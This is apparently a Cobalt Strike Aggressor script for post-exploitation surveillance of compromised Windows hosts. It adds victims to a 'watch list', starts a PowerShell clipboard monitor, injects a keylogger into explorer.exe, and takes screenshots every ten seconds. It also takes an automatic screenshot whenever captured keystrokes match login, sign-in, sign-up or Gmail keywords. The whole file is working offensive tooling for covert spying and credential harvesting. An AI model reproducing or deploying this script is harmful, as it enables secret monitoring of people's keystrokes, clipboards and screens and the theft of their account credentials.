
global('@watchlist');

sub addwatch {
  if ($1 !in @watchlist) {
    add(@watchlist, $1);
    	btask($1,"Adding $1 to Watch List");
	
	bpowershell_import($1, script_resource("scripts/clipboard-monitor.ps1"));
        bpowershell($1, "Start-ClipboardMonitor");
    	btask($1,"Started Clipboard Monitor on bid $1");

    	btask($1,"Screenshot on bid $1");
   	bscreenshot($1,0);

	getexplorerpid($1, {
			bkeylogger($1, $2, "x64");
		});
    	btask($1,"Started keylogger on bid $1");
  	bnote($1,"On watch list");

  }
  else {
    btask($1,"$1 is already on Watch List");
  }
}

sub removewatch {
  if ($1 in @watchlist){
    @rem = @($1);
    @watchlist = removeAll(@watchlist, @rem);
    btask($1,"Removed $1 from Watch Lists");
    bnote($1,"");
    }
  else {
    btask($1,"$1 is not being watched");
  }
}


alias addtowatchlist {
  addwatch($1);
}

alias removefromwatchlist {
  removewatch($1);
}
alias watching {
  btask($1,@watchlist);
}



on heartbeat_10s {

	#foreach $bid (@watchlist) {

	bscreenshot(@watchlist);

	#}
}


on keystrokes {

    if('**log*in**' iswm lc($1) || '**sign*up**' iswm lc($1) || '**sign*in**' iswm lc($1) || '**gmail**' iswm lc($1)) {
             println("MATCHED KEY WORD:");
                btask($1['bid'],"Auto screenshot");
                bscreenshot($1['bid'], 0);
                println($1['data']);
         }

}

sub getexplorerpid {
  bps($1, lambda({
    local('$pid $name $entry');
    foreach $entry (split("\n", $2)) {
      ($name, $ppid, $pid, $arch) = split("\\s+", $entry);
      println($entry);
      # println("Name: $name PID: $pid ");
      if ($name eq "explorer.exe") {
        # $1 is our Beacon ID, $pid is the PID of explorer.exe
        [$callback: $1, $pid];
      }
    }
  }, $callback => $2));
}
